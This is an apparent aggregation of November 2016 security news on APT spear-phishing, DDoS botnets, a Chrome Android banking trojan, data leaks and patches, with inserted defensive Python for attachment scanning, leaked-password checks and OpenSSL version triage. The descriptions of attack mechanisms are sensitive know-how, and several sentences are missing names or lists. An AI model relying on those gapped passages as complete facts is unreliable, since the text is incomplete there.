The researchers at published a detailed analysis of the BlackNurse attack.

Palo Alto Networks has issued a specific advisory to address this specific DDoS attack.

Donald Trump will control the NSA – what this means for your privacy
18.11.2016 securityaffairs BigBrothers

Earlier this week, Donald Trump won a stunning election victory that will put him in charge of the world’s most powerful mass surveillance infrastructure.
Regardless of which side of the political spectrum you are on, Trump’s control over the NSA is now an indisputable fact, and we think it is worth taking a closer look at what this means. It is important to note that as a Swiss company which benefits from Swiss government support, ProtonMail follows the Swiss policy of neutrality. We do not take any position for or against Trump, nor any position for or against any particular country or government. We believe privacy is a universal value, so we do not take any sides.

However, given America’s significant influence on the world, and the large number of ProtonMail users who come from the US, we are not a disinterested party. Furthermore, we realise that the implications of a Trump presidency also interest a large proportion of the ProtonMail community, so we are here today to offer our unbiased opinion.

How much power over the NSA does Trump have?
Due to the way the US government is structured, President Trump will have a large amount of control over the NSA. The NSA is no different from any other federal agency which the president controls. The US president will be able to dictate how the agency operates through his power to appoint the NSA Director. The NSA Director needs to be confirmed through majority vote by the US Senate, but due to Republican control over the Senate, President Trump will have complete freedom to appoint anyone he wants to carry out his orders.

As a federal agency however, the activities of NSA are governed by federal law, in particular, the Foreign Intelligence Surveillance Act. However, with Republican control over both houses of Congress, President Trump would have broad power to rewrite FISA as he sees fit or introduce a new law. Of course, a new law could be subject to court challenge which could eventually work its way up to the US Supreme court, but Trump is also expected to gain control over the Supreme court. Therefore, all things considered, there is no denying that President Trump would have broad powers to re-shape the US surveillance apparatus to serve his agenda.

Should Americans Be Worried?
Since Trump’s victory, the number of new users coming to ProtonMail has doubled compared to the previous week. Many of our new users have voiced a few common concerns both on Twitter and also in emails to us. Given Trump’s campaign rhetoric against journalists, political enemies, immigrants, and Muslims, there is concern that Trump could use the new tools at his disposal to target certain groups. As the NSA currently operates completely out of the public eye with very little legal oversight, all of this could be done in secret.

ProtonMail new user signups doubled immediately after Trump’s election victory.

It is not Trump’s fault
It is tempting to blame all this on Trump and his supporters, but that is taking the easy way out. All Trump does is put a new face on the existing privacy problem, so now it concerns a segment of the population that previously didn’t care as much. ProtonMail users have always come from both the left and right side of the political spectrum. Today, we are seeing an influx of liberal users, but ProtonMail has also long been popular with the political right, who were truly worried about big government spying, and the Obama administration having access to their communications. Now the tables have turned.

The same terror the political right has experienced is now being felt in liberal bubbles such as Silicon Valley for the first time. The left is correct to be terrified of a Trump-led NSA snooping on their communications, especially since Silicon Valley giants like Google and Facebook can be forced to spy on users on behalf of Trump’s NSA. However, this precedent was not set by Trump – he hasn’t even taken office yet. The first major incident of a US tech giant being complicit in US government spying actually took place in 2015 under the Obama administration.

Privacy is something we must all champion
One of the problems with having a technological infrastructure that can be abused for mass surveillance purposes, is that governments can and do change, quite regularly in fact. This demonstrates that privacy isn’t just a liberal or conservative issue, it is something that we all need to champion, regardless of our political leanings. This is why ProtonMail is committed to building a safe haven for all people in the world, regardless of nationality, political views, or religious beliefs.

The only way to protect our freedom is to build technologies, such as end-to-end encryption, which cannot be abused for mass surveillance. Governments can change, but the laws of mathematics upon which encryption is based, are much harder to change.

What can you do to protect your privacy rights?
Privacy is a non-partisan issue, and we hope politicians around the world wake up to the fact that privacy is not only essential for democracy, it is also critical for securing the growing digital economy. In the case of encrypted email services such as ProtonMail, you even get better security in addition to the privacy. Privacy is a cause that we should all be able to unify behind, regardless of political beliefs.

In the meantime, there are fortunately a growing number of services which can help to keep government spies out of your communications, so there is no need to worry regardless of who wins the election. For securing your email, ProtonMail offers free encrypted email accounts, although you can support ProtonMail by donating or upgrading to a paid account.

For defending against NSA mass surveillance, we also recommend the Signal messaging app, using a VPN service, or using an alternative search engine such as or But most importantly, spread the word about the dangers of mass surveillance so politicians take note and make protecting our digital rights a priority.

About the author The ProtonMail Team


Pawn Storm APT conducted spear-phishing attacks before zero-days was fixed
18.11.2016 securityaffairs APT

The Pawn Storm APT group exploited some zero-day vulnerabilities in targeted attacks across the world before they were patched.
The Pawn Storm APT group, also known as APT28 and Fancy Bear, exploited some zero-day flaws in targeted attacks before they were patched.

The threat actors powered spear phishing attacks between the discovery of the zero-days and the release of the security patches. This is what happened between October and early November, when the Pawn Storm APT targeted governments and embassies around the world.

The zero-days exploited by Pawn Storm are the Adobe Flash CVE-2016-7855 flaw, which was fixed on October 26, and the Windows privilege escalation flaw CVE-2016-7255, which was fixed on November 8, 2016.

After CVE-2016-7855 was fixed, Pawn Storm used it in several spear phishing campaigns against high-profile targets from October 28 until early November.

In November the Pawn Storm APT launched spear-phishing campaigns against various governments leveraging emails with the subject line “European Parliament statement on nuclear threats.” The attackers forged the email address of a press officer working for the media relations office of the European Union.

When the victim clicks on the link in the spear-phishing e-mail, they are redirected to a domain hosting Pawn Storm’s exploit kit.

“The exploit kit will first fingerprint its targets with invasive JavaScript, which uploads OS details, time zone, installed browser plugins, and language settings to the exploit server. The exploit server may then send back an exploit or simply redirect to a benign server.” reads the analysis published by Trend Micro.


The researchers also detected other spear-phishing attacks: from October 28 until early November 2016, attackers leveraged a fake invitation to a real “Cyber Threat Intelligence and Incident Response conference in November” organized by Defense IQ.

The spear-phishing e-mail contained an RTF (Rich Text Format) document called “Programm Details.doc.”

The document has an embedded Flash file (SWF_CONEX.A) that downloads additional files from a remote server.

“Apart from these two campaigns, several others were also launched by Pawn Storm in the period between the discovery of the zero-days and the release of Adobe’s and Microsoft’s patches on October 26 and November 8, 2016.” continues the analysis. “This shows that Pawn Storm ramped up their spear-phishing attacks shortly after its zero-days were discovered. Not all organizations may have been able to immediately patch Adobe’s Flash, and the Windows vulnerability wasn’t patched until November 8, 2016.”

The analysis also includes the IoCs for the above attacks.

Capgemini inadvertently leaks data of recruitment firm Michael Page
18.11.2016 securityaffairs Crime

Job-related information belonging to hundreds of thousands of individuals in a Michael Page database was exposed online by Capgemini.
Capgemini has inadvertently published a database belonging to Michael Page, a recruitment company owned by PageGroup.

The data leak has accidentally exposed job-related records of hundreds of thousands of individuals.

Michael Page has notified customers that their personal information was inadvertently exposed. Leaked records include names, email addresses, encrypted passwords, phone numbers and job-related information.

The French firm Capgemini provides IT services to Michael Page; its staff accidentally exposed a Michael Page backup database containing roughly 30 GB of SQL files.

The data leak was first reported by the popular security expert Troy Hunt, who manages a breach notification website. Hunt received information about the Capgemini data breach in October from the same person who reported to him the data leak that exposed records of the Australian Red Cross Blood Service (550,000 personal records exposed).

PageGroup and Capgemini determined that the backup was related to a testing environment for the PageGroup websites.

The archive includes 780,000 unique email addresses and job-related information.

“I’ll refer to Michael Page’s disclosure a little later on, but what I will say here is that there were over 780k unique email addresses in that one file and plenty of data relating to candidates’ jobs such as cover letters relating to their experience.” wrote Hunt.


PageGroup tried to downplay the incident, saying the data is unlikely to be used for illegal purposes because only Hunt and the person who discovered the leak accessed the information, and both have since destroyed their copies of the database.

“We have ensured the website is secure. We are treating this issue very seriously and are working with our IT vendor, Capgemini as a matter of urgency to fully investigate how this incident occurred and to put in place measures to ensure it does not happen again,” reads the statement published by PageGroup. “Capgemini fully manage our PageGroup websites and is regarded as a global leader in consulting, technology and outsourcing services. It has all the appropriate security certificates and ISO certifications in place, which we believed would ensure that the website environments would be secure and safe in their hands.”

A Facebook glitch declared all its users are dead, including Zuckerberg
18.11.2016 securityaffairs Social

Facebook users who logged on to their accounts discovered that their accounts had been turned into “memorialized accounts,” due to their alleged death.
It is as funny as it is disturbing, but technology can do this too, and this time it happened to Facebook. Last night the tech giant declared everyone dead due to a glitch.

The memorial feature was introduced by Facebook in 2015 to allow families to access their loved ones’ social accounts after their death.

The glitch was first noticed by employees at Business Insider.

“A Facebook bug is displaying people as having died when visiting their profile page,” reads the post published by Business Insider.

“Multiple Business Insider employees reported seeing the message at the top of their Facebook profiles on Friday, and the bug appears to also be affecting Facebook CEO Mark Zuckerberg.”

On Friday afternoon, users who logged on to their accounts discovered that their accounts turned to a “memorialized account,” due to their alleged death.


The platform also declared its CEO, Mark Zuckerberg, dead.

“We hope people who love Mark will find comfort in the things others share to remember and celebrate his life,” read a statement on Mark Zuckerberg’s profile.

Imagine the impact on users visiting the Facebook pages of their friends or of popular individuals.

The colleagues at THN reached out to the company for an explanation:

“For a brief period today, a message meant for memorialized profiles was mistakenly posted to other accounts. This was a terrible error that we have now fixed. We are very sorry that this happened and we worked as quickly as possible to fix it.” a Facebook spokesperson told THN.

But Facebook works magic: once it solved the problem, it gave us new life.

We have been resurrected!

Remember that users can opt to have their account completely deleted after their death or turned into a memorial page. The page allows friends and family to leave messages and share memories on their profile.

A hole in Chrome allowed 318,000 devices to be attacked
11.11.2016 Root
The Chrome browser on Android contains a serious vulnerability that is being actively exploited to install a banking trojan. More than 300,000 devices have succumbed so far.
A security hole in the Google Chrome browser for Android allows any application in .apk format, i.e. one from outside the official Google Play store, to be silently downloaded to the device’s storage card. The user does not have to confirm anything; everything happens silently and automatically. The bug is already being exploited in practice.

Some users have noticed in recent days that a dialog pops up on their Android device warning that the device is infected. It recommends installing an application that will remove the virus by itself.

Unfortunately, this is an attack that exploits a vulnerability in Google Chrome and uses a crafted web page to manipulate the user into enabling manual installation of applications from .apk files. It then downloads such an application straight into the system, without the user’s confirmation and without their knowledge. The browser normally warns the user before downloading a file and asks whether they want to save it to the card. In this case, however, a bug in Chrome is exploited that allows the file to be written without any warning.

The file is called last-browser-update.apk and contains a banking trojan named Trojan-Banker.AndroidOS.Svpeng.q. After successful installation it requests administrator rights so that it can block antivirus products on the device. It then steals banking data and card numbers, displays phishing messages and exfiltrates other data such as contacts, messages and browsing history.

The malicious code can be found on ordinary websites, because it spreads through the Google AdSense advertising network. AdSense is used by a great many websites, since it sells their advertising space automatically and earns them the money to fund their operation. In practice, virtually any page can thus be “attacked”. The trojan then starts downloading to the user as soon as the page carrying the advert is loaded.

Since August, over 318,000 Android devices have been attacked this way, and the infection mechanism is described on their blog by Kaspersky Lab researchers Mikhail Kuzin and Nikita Buchka. The method consists of splitting the downloaded file into parts and downloading it using a function of the Blob() class. In that case the browser does not check the content of the file and allows it to be saved.

The saved file can have one of the following names:

These are the names of existing legitimate applications, and the trojan then explains to the user that an important update needs to be installed. The user then merely confirms that the package can be installed, and the problem is born.

Google knows about the problem, has removed the affected adverts and says it will patch the bug. Unfortunately no specific date has been mentioned, but if everything follows the standard path, the next patch will arrive at the beginning of December, when a new Chrome update is released after six weeks. Attackers will therefore have another three weeks during which they can keep exploiting the bug.

5 Major Russian Banks Hit With Powerful DDoS Attacks
11.11.2016 thehackernews Attack
Distributed Denial of Service (DDoS) attacks have risen enormously in the past few months and, mostly, they are coming from hacked and insecure internet-connected devices, commonly known as the Internet of Things (IoT).
Recent DDoS attack against DNS provider Dyn that brought down a large chunk of the Internet came from hacked and vulnerable IoT devices such as DVRs, security cameras, and smart home appliances.
This DDoS was the biggest cyber attack the world has ever seen.
Now, in the latest incident, at least five Russian banks have been subject to a swathe of DDoS attacks for two days, said the Russian banking regulator.
The state-owned Sberbank was one of the five targets of the attacks, which began last Tuesday afternoon and lasted over the next two days.
According to Kaspersky Lab, the longest attack lasted 12 hours, peaked at 660,000 requests per second, and came from a botnet of at least 24,000 hacked devices located in 30 countries.
Although the culprit appears to be using hacked and insecure IoT devices such as CCTV cameras or digital video recorders, Kaspersky Lab believes that the latest attack does not look like the work of the "Mirai IoT botnet" — the one used to disrupt the Dyn DNS service.
Mirai is a piece of nasty malware that scans for IoT devices with weak factory default settings (hard-coded usernames and passwords), converts them into bots, and then uses them to launch DDoS attacks.
In a statement, a Sberbank representative said the bank managed to neutralize the cyber attack without disturbing the ongoing operation of its website, adding that the latest DDoS attacks were among the largest the bank had ever seen, RT reports.
Another Russian bank, Alfabank, has also confirmed the DDoS attack, though it called the attack weak. The bank's representative told RIA Novosti that "there was an attack, but it was relatively weak. It did not affect Alfabank's business systems in any way."
Kaspersky said more than half of the IoT botnet devices were located in the United States, India, Taiwan, and Israel. To gain control over the devices, the hackers took advantage of smart devices that use easy-to-guess passwords.
Security researchers are continually pointing out serious threats from new connected devices that have been rushed to market with poor, or no, security implementations.
Just last week, the DDoS attack through hacked IoT devices led to the disruption of the heating systems for at least two apartments in the city of Lappeenranta, literally leaving their residents in subzero weather.
Keeping in mind the rise in the number of insecure IoT devices, it is entirely possible that the next round of attacks from IoT-based botnets could be orders of magnitude larger, so much so that it could even take down our cities if we let it.
So the best way to keep your smart devices from becoming part of a DDoS botnet is to be more vigilant about the security of your internet-connected devices. Change the default settings and credentials of your devices and always keep them behind a firewall.
Although IoT manufacturers and Internet standards bodies have a huge role to play in securing these vulnerable devices, consumers must also take some personal responsibility for safeguarding their own devices.

Warning: Beware of Post-Election Phishing Emails Targeting NGOs and Think Tanks
11.11.2016 thehackernews Spam
Just a few hours after Donald Trump won the 2016 US Presidential Election, a hacking group launched a wave of cyber attacks targeting U.S.-based policy think-tanks with a new spear phishing campaign designed to fool victims into installing malware.
The group of nation-state hackers, also known as Cozy Bear, APT29, and CozyDuke, is one of those involved in the recent data breach of the Democratic National Committee (DNC) and is allegedly tied to the Russian government.
On Wednesday, the hackers sent a series of phishing emails to dozens of targets associated with non-governmental organizations (NGOs), policy think tanks in the US and even inside the US government, said security firm Volexity.
Phishing Attacks Powered by 'PowerDuke' Malware
The phishing emails were sent from purpose-built Gmail accounts and other compromised email accounts at Harvard University's Faculty of Arts and Sciences (FAS), trying to trick victims into opening tainted attachments containing malware and clicking on malicious links.
Once this was done, the phishing e-mail dropped a new variant of Backdoor malware, dubbed "PowerDuke," giving attackers remote access to the compromised systems.
PowerDuke is an extremely sophisticated piece of malware in both its way of infecting people as well as concealing its presence.
Besides making use of a wide variety of approaches, PowerDuke uses steganography to hide its backdoor code in PNG files.
The firm spotted and reported at least five waves of phishing attacks targeting people who work for organizations, including Radio Free Europe/Radio Liberty, the RAND Corporation, the Atlantic Council, and the State Department, among others.
"Three of the five attack waves contained links to download files from domains that the attackers appear to have control over," the firm said in a blog post. "The other two attacks contained documents with malicious macros embedded within them. Each of these different attack waves was slightly different from one another."
Beware of Post-Election Themed Phishing Emails
All the phishing emails were election-themed. Why?
After Trump won the US presidential election, half of America, as well as people around the world, were mourning the result and curious to know how Trump had won.
People even started searching on Google: How did Donald Trump win the US presidential election? Was the election flawed? Why did Hillary Clinton lose?
Hackers took advantage of this curiosity to target victims, especially those who worked with the United States government and were much more concerned about Trump's victory.
Two of the emails claimed to have come from the Clinton Foundation giving insight into the elections, two others purported to be documents pertaining to the election's outcome being revised or rigged, and the last one offered a link to a PDF download on 'Why American Elections Are Flawed.'
The emails were sent using the real email address of a professor at Harvard, which indicates that the hackers likely hacked the professor's email and then used his account to send out the phishing emails.
The emails either contained malicious links to .ZIP files or included malicious Windows shortcut files linked to a "clean" Rich Text Format document and a PowerShell script.
Once clicked, the script installed PowerDuke on a victim's computer that could allow attackers to examine and control the target system. The malware has the capability to secretly download additional malicious files and evade detection from antivirus products.
Security firm CrowdStrike claimed in June 2016 that the hacking team Cozy Bear has previously hacked into networks belonging to the White House, State Department, and the United States Joint Chiefs of Staff.
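One defensive control the description above suggests is inspecting ZIP attachments for Windows shortcut files before they reach a mailbox, since a shortcut can be renamed to look like a document and still launch a script. The Python below is an added example written for this page, not Volexity's or the original article's code; the archive it inspects is constructed in memory, and the shell-link header bytes come from the MS-SHLLINK format (HeaderSize 0x4C followed by the LinkCLSID).

```python
"""Flag Windows shortcut (.lnk) files and script payloads inside a ZIP attachment.

Added example (not from Volexity or the original article). The archive is
constructed in memory so the check runs offline.
"""
import io
import zipfile
from typing import Dict, List

# First 8 bytes of a Shell Link (.lnk) file: HeaderSize 0x0000004C followed by
# the start of LinkCLSID {00021401-0000-0000-C000-000000000046} (little-endian).
LNK_MAGIC = b"\x4c\x00\x00\x00\x01\x14\x02\x00"
SCRIPT_EXTENSIONS = (".ps1", ".js", ".vbs", ".bat", ".cmd")
DECOY_EXTENSIONS = (".rtf", ".doc", ".docx", ".pdf")


def classify_entry(name: str, head: bytes) -> str:
    """Return a '; '-joined list of reasons an entry is suspicious, or '' if none."""
    reasons: List[str] = []
    lower = name.lower()
    if head.startswith(LNK_MAGIC):          # content says "shortcut", whatever the name
        reasons.append("shell link header")
    if lower.endswith(".lnk"):
        reasons.append(".lnk extension")
    if lower.endswith(SCRIPT_EXTENSIONS):
        reasons.append("script payload")
    stem, _, ext = lower.rpartition(".")    # 'report.rtf.lnk' -> stem 'report.rtf', ext 'lnk'
    if stem.endswith(DECOY_EXTENSIONS) and "." + ext not in DECOY_EXTENSIONS:
        reasons.append("decoy double extension")
    return "; ".join(reasons)


def inspect_attachment(zip_bytes: bytes) -> Dict[str, str]:
    """Map each suspicious entry name to its reasons; clean entries are omitted."""
    findings: Dict[str, str] = {}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as archive:
        for info in archive.infolist():
            if info.is_dir():
                continue
            with archive.open(info) as fh:
                head = fh.read(len(LNK_MAGIC))   # only the header is needed
            reason = classify_entry(info.filename, head)
            if reason:
                findings[info.filename] = reason
    return findings


def build_sample_attachment() -> bytes:
    """Constructed sample archive mimicking the lure pattern (no real payloads)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("Election Results.rtf.lnk", LNK_MAGIC + b"\x00" * 68)  # shortcut posing as RTF
        z.writestr("report.rtf", LNK_MAGIC + b"\x00" * 68)                # shortcut with wrong extension
        z.writestr("update.ps1", "Write-Host 'placeholder script'\n")     # script payload
        z.writestr("notes.rtf", "{\\rtf1\\ansi Harmless decoy text}")      # genuine RTF, not flagged
        z.writestr("readme.txt", "plain text\n")
    return buf.getvalue()


if __name__ == "__main__":
    for entry, why in inspect_attachment(build_sample_attachment()).items():
        print(f"{entry}: {why}")
```

Checking the header bytes rather than only the extension is what catches the second sample entry; a gateway that trusts the `.rtf` suffix would pass it through.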

For the first time massive DDoS attacks hit Russian banks in 2016
11.11.2016 securityaffairs Attack

A number of prolonged DDoS attacks hit at least five Russian banks this week and experts suspect the involvement of the Mirai Botnet once again.
A wave of prolonged DDoS attacks hit at least five Russian banks this week.

Among the victims of the DDoS attacks against online banking services are Sberbank and Alfabank.

The string of DDoS attacks began on Tuesday afternoon and lasted over two days.

“At least five Russian major banks came under a continuous hacker attack, although online client services were not disrupted. The attack came from a wide-scale botnet involving at least 24,000 computers, located in 30 countries.” reads
“The attack began Tuesday afternoon, and continued for two days straight, according to a source close to Russia’s Central Bank quoted by RIA Novosti. Sberbank confirmed the DDoS attack on its online services.”
“The attacks are conducted from botnets, consisting of tens of thousands of computers, which are located in tens of countries,” Sberbank’s press service told RIA.

According to an unnamed Russian Central Bank official, the attackers used a botnet of IoT devices, likely a Mirai botnet. The Mirai botnet is the same threat that targeted the Dyn DNS service, causing an Internet outage for a large portion of US netizens.


Both Sberbank and Alfabank have confirmed the DDoS attacks against their systems, but Alfabank downplayed the incident classifying the attack as a “weak” one.

“We registered a first attack early in the morning … the next attack in the evening involved several waves, each of them was twice as powerful as the previous one. Bank’s cybersecurity noticed and located the attack in time. There have been no problems in client online services,” Sberbank representative said.

“There was an attack, but it was relatively weak. It did not affect Alfabank’s business systems in any way,” the bank told RIA Novosti.

According to the experts from Kaspersky Lab, this is the first time that massive DDoS attacks hit Russian banks this year.

A previous string of DDoS attacks against banks was observed in October 2015.

Microsoft fixed dozens of vulnerabilities, some of which hackers are already exploiting

11.11.2016 SecurityWorld Vulnerabilities
The bugs, some of which are even critical, affect Windows, Office, Edge, Internet Explorer and SQL Server.

The fixes are covered by 14 security updates, so-called security bulletins, one of which is dedicated directly to Adobe Flash Player, which since Windows 8.1 and 10 is updated through Windows Update. Six bulletins are rated critical and eight important.

Administrators should first apply MS16-135, which fixes a zero-day vulnerability currently being exploited by a hacker group known in professional circles as Fancy Bear, APT28 or Strontium.

The vulnerability, designated CVE-2016-7255, was publicly disclosed by Google last week, only 10 days after it had informed Microsoft about it. This caused some friction in the relationship between the two companies.

Google gives vendors only seven days to fix bugs, or at least mitigate their impact, if the vulnerabilities are already being exploited. Microsoft has long disagreed with this strategy and believes that disclosing details of the vulnerability exposed users to increased risk.

Another key bulletin is MS16-132, rated critical. It fixes several remote code execution (RCE) bugs, including another zero-day vulnerability which, according to Microsoft, hackers are also exploiting.

The vulnerability is in the Windows font library and can be exploited through specially crafted fonts embedded in web pages or documents. Successful exploitation allows attackers to take complete control of the system, Microsoft warns in the bulletin.

The remaining three critical security updates are for Internet Explorer and Edge, the company’s web browsers. They are bulletins MS16-142 and MS16-129. Although details of the bugs have already leaked publicly, according to Microsoft nobody has exploited them yet.

The security update aimed at the company’s Office suite, MS16-133, is rated important; it again patches remote code execution flaws. The vulnerabilities can be exploited using purpose-built documents.

“Because Office documents are prevalent in corporate environments, I think [administrators] should treat the bulletin as critical, even though it is only rated important,” says Amol Sarwate, director of Vulnerability Labs at Qualys, in his analysis of the updates.

Microsoft SQL Server administrators should in turn prioritise the MS16-136 bulletin, which includes patches for the RDBMS engine, the MDS API, SQL Analysis Services and SQL Server Agent.

“SQL Server vulnerabilities are relatively rare, and although there is no risk of remote code execution attacks here, attackers can gain elevated privileges on the system, which may allow them to view, change or delete data or create new accounts,” adds Sarwate.

Facebook Buys Leaked Passwords From Black Market, But Do You Know Why?
11.11.2016 thehackernews Social
Facebook is reportedly buying stolen passwords that hackers are selling on the underground black market in an effort to keep its users' accounts safe.
On the one hand, we just came to know that Yahoo did not inform its users of the recently disclosed major 2014 hacking incident that exposed half a billion user accounts, even though it was aware of the hack in 2014.
On the other hand, Facebook takes every possible measure to protect its users' security, even though the company has so far managed to avoid the kind of security scandal, data breach or hack that has recently affected top-notch companies.
Speaking at the Web Summit 2016 technology conference in Portugal, Facebook CSO Alex Stamos said that over 1.3 billion people use Facebook every day; keeping them secure means building attack-proof software to keep out hackers, but keeping them safe is a far bigger task.
Stamos said there is a difference between 'security' and 'safety,' as he believes that his team can "build perfectly secure software and yet people can still get hurt."
Stamos was formerly Chief Information Security Officer at Yahoo and left the company in 2015 after discovering that its Chief Executive Marissa Mayer had authorized the government surveillance program.
Stamos joined Facebook in summer 2015 and now leads the security team at the social network. He said that the biggest headache he deals with there is caused by the passwords users choose to secure their accounts.
"The reuse of passwords is the No. 1 cause of harm on the internet," said the security chief.
According to him, the username and password system that was introduced in the 1970s will not serve us now in 2016.
As CNET reports, when passwords are stolen en masse and traded on the black market, it becomes apparent just how many users choose the weakest passwords, such as 12345 and password, to secure their online accounts, automatically making those accounts more vulnerable to being hacked.
And this issue is something the social network giant is keen to help its users avoid.
In an attempt to check that its users are not making use of these commonly used passwords for their Facebook accounts, Stamos disclosed that the company buys passwords from the black market and then cross-references them with encrypted passwords used on its site.
Stamos said that the social network then alerts tens of millions of users that their passwords needed changing as they were not strong enough to protect their accounts.
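The cross-reference Stamos describes has a subtlety worth seeing in code: a leaked list is plaintext, while stored passwords are (ideally) salted hashes, so each leaked candidate has to be re-hashed with every user's salt rather than matched hash-to-hash. The following Python is an added example written for this page, not Facebook's code; the user records, the leaked list and the PBKDF2 parameters are all constructed here, and the same breach index doubles as a check that rejects a known-leaked password at the moment a user sets it.

```python
"""Cross-reference a leaked password list against salted password hashes.

Added example (not Facebook's code). Stored hashes are salted, so a leaked
plaintext list cannot be matched hash-to-hash; each candidate is re-hashed
with each user's salt and compared in constant time.
"""
import hashlib
import hmac
import os
from dataclasses import dataclass
from typing import Iterable, List, Set

# Iteration count kept low so the example runs quickly; production systems use
# far more (or a memory-hard KDF such as scrypt or Argon2).
PBKDF2_ITERATIONS = 20_000


@dataclass(frozen=True)
class UserRecord:
    username: str
    salt: bytes
    pw_hash: bytes


def hash_password(password: str, salt: bytes) -> bytes:
    """Derive a salted PBKDF2-HMAC-SHA256 hash suitable for storage."""
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, PBKDF2_ITERATIONS)


def register(username: str, password: str) -> UserRecord:
    """Create a user record with a fresh random salt."""
    salt = os.urandom(16)
    return UserRecord(username, salt, hash_password(password, salt))


def build_breach_set(leaked_passwords: Iterable[str]) -> Set[str]:
    """Index a leaked plaintext list by SHA-1 so the clear text need not be retained."""
    return {hashlib.sha1(p.encode("utf-8")).hexdigest() for p in leaked_passwords}


def is_breached(candidate: str, breach_set: Set[str]) -> bool:
    """Check at set/change time whether a chosen password appears in the breach index."""
    return hashlib.sha1(candidate.encode("utf-8")).hexdigest() in breach_set


def sweep_users(users: Iterable[UserRecord], leaked_passwords: Iterable[str]) -> List[str]:
    """Return usernames whose stored hash matches any leaked password.

    Cost is O(users x leaked x KDF), which is why a real deployment sweeps in
    batches or checks at login/reset time; the logic is the same either way.
    """
    leaked = list(dict.fromkeys(leaked_passwords))   # dedupe, keep order
    hits: List[str] = []
    for user in users:
        for candidate in leaked:
            if hmac.compare_digest(hash_password(candidate, user.salt), user.pw_hash):
                hits.append(user.username)
                break                                # one match is enough to notify
    return hits


# Constructed sample data: a tiny "leaked" list and three accounts.
LEAKED_SAMPLE = ["123456", "password", "12345", "qwerty", "password", "letmein"]
SAMPLE_USERS = [
    register("alice", "password"),
    register("bob", "Tr0ub4dor&3-but-longer"),
    register("carol", "12345"),
]


def demo() -> List[str]:
    """Usernames that would receive a 'change your password' notice."""
    return sweep_users(SAMPLE_USERS, LEAKED_SAMPLE)


if __name__ == "__main__":
    print("users to notify:", demo())
```

The sweep is deliberately the expensive path: the salt defeats precomputation for attackers and for the defender alike, so the only way to learn that a user holds a leaked password is to run the KDF per user per candidate, which is why checking at password-set time against the cheap breach index is the better first line.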
Facebook provides you a whole bunch of tools to tighten up the security of your account, including traditional two-factor authentication, identifying faces of friends, as well as machine learning algorithms to determine and inform whether activity on your account is fraudulent.
Users are always advised to enable two-factor authentication, which is an effective measure to keep a tight hold on your account even after hackers have your credentials.
Another new measure tackles the issue of account recovery. Even if hackers find their way into your email account, which could let them seize your Facebook account easily by resetting your password, the social network allows you to let close friends verify an account recovery request on your behalf.

OpenSSL Project fixed the CVE-2016-7054 High severity DoS bug
11.11.2016 securityaffairs Vulnerability

The OpenSSL Project has released the OpenSSL 1.1.0c update that addresses several vulnerabilities, including a high-severity DoS flaw (CVE-2016-7054).
The OpenSSL Project has released an update for the 1.1.0 branch (OpenSSL 1.1.0c) to fix a number of vulnerabilities. One of the issues solved with the update is the high severity denial-of-service (DoS) flaw CVE-2016-7054 that was reported by Robert Święcki from the Google Security Team.

The CVE-2016-7054 vulnerability is a heap-based buffer overflow related to TLS connections using *-CHACHA20-POLY1305 cipher suites.

“TLS connections using *-CHACHA20-POLY1305 ciphersuites are susceptible to a DoS attack by corrupting larger payloads. This can result in an OpenSSL crash. This issue is not considered to be exploitable beyond a DoS.” reads the advisory published

The flaw can be triggered by corrupting larger payloads, which leads to a DoS condition because OpenSSL crashes.

The OpenSSL Project confirmed the flaw does not affect versions prior to 1.1.0.


The OpenSSL 1.1.0c also patches the following vulnerabilities:

a moderate severity flaw tracked as CVE-2016-7053, which affects OpenSSL 1.1.0 and can be triggered to cause applications
a low severity flaw tracked as CVE-2016-7055 related to the Broadwell-specific Montgomery multiplication procedure, which also affects OpenSSL 1.0.2. The patch for OpenSSL 1.0.2 will be included in the next update.
I remind you that version 1.0.1 will no longer be supported after December 31, 2016.

“As per our previous announcements and our Release Strategy, support for OpenSSL version 1.0.1 will cease on 31st December 2016. No security updates for that version will be provided after that date. Users of 1.0.1 are advised to upgrade,” continues the advisory. “Support for versions 0.9.8 and 1.0.0 ended on 31st December 2015. Those versions are no longer receiving security updates.”
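Turning the advisory's facts into a check a practitioner can run against a host: the following Python is an added example, not OpenSSL Project code. It encodes only what the text above states (CVE-2016-7054 affects the 1.1.0 branch and is fixed in 1.1.0c; versions prior to 1.1.0 are not affected; 1.0.1 support ends on 31 December 2016; 0.9.8 and 1.0.0 are already unsupported) and assumes that a 1.1.0 patch letter sorts in release order. The sample version strings are constructed.

```python
"""Classify an OpenSSL version string against the advisory's fixes and support dates.

Added example (not OpenSSL Project code). Facts encoded: CVE-2016-7054 affects
only the 1.1.0 branch and is fixed in 1.1.0c; 1.0.1 support ends 31 Dec 2016;
0.9.8 and 1.0.0 are already unsupported. Assumption: the 1.1.0 patch letter
('' < 'a' < 'b' < 'c') sorts in release order.
"""
import re
import subprocess
from datetime import date
from typing import Optional, Tuple

Branch = Tuple[int, int, int]

CVE_2016_7054_BRANCH: Branch = (1, 1, 0)
CVE_2016_7054_FIXED_LETTER = "c"                 # 1.1.0, 1.1.0a, 1.1.0b affected; 1.1.0c fixed
EOL_1_0_1 = date(2016, 12, 31)                   # last supported day for the 1.0.1 branch
ALREADY_UNSUPPORTED = {(0, 9, 8), (1, 0, 0)}      # support ended 31 Dec 2015

# Accepts both bare '1.1.0b' and the `openssl version` banner 'OpenSSL 1.1.0b  <date>'.
_VERSION_RE = re.compile(r"^(?:OpenSSL\s+)?(\d+)\.(\d+)\.(\d+)([a-z]*)")


def parse_version(text: str) -> Tuple[Branch, str]:
    """'OpenSSL 1.1.0b' -> ((1, 1, 0), 'b'); '1.0.2j' -> ((1, 0, 2), 'j')."""
    m = _VERSION_RE.match(text.strip())
    if not m:
        raise ValueError(f"unrecognised OpenSSL version string: {text!r}")
    return (int(m.group(1)), int(m.group(2)), int(m.group(3))), m.group(4)


def affected_by_cve_2016_7054(text: str) -> bool:
    """True for 1.1.0 releases before 1.1.0c; other branches never shipped the bug."""
    branch, letter = parse_version(text)
    if branch != CVE_2016_7054_BRANCH:
        return False
    return letter < CVE_2016_7054_FIXED_LETTER   # string order == release order (assumption)


def support_status(text: str, today: date) -> str:
    """'supported', 'end-of-life <date>' (still in support, deadline known) or 'unsupported'."""
    branch, _ = parse_version(text)
    if branch in ALREADY_UNSUPPORTED:
        return "unsupported"
    if branch == (1, 0, 1):
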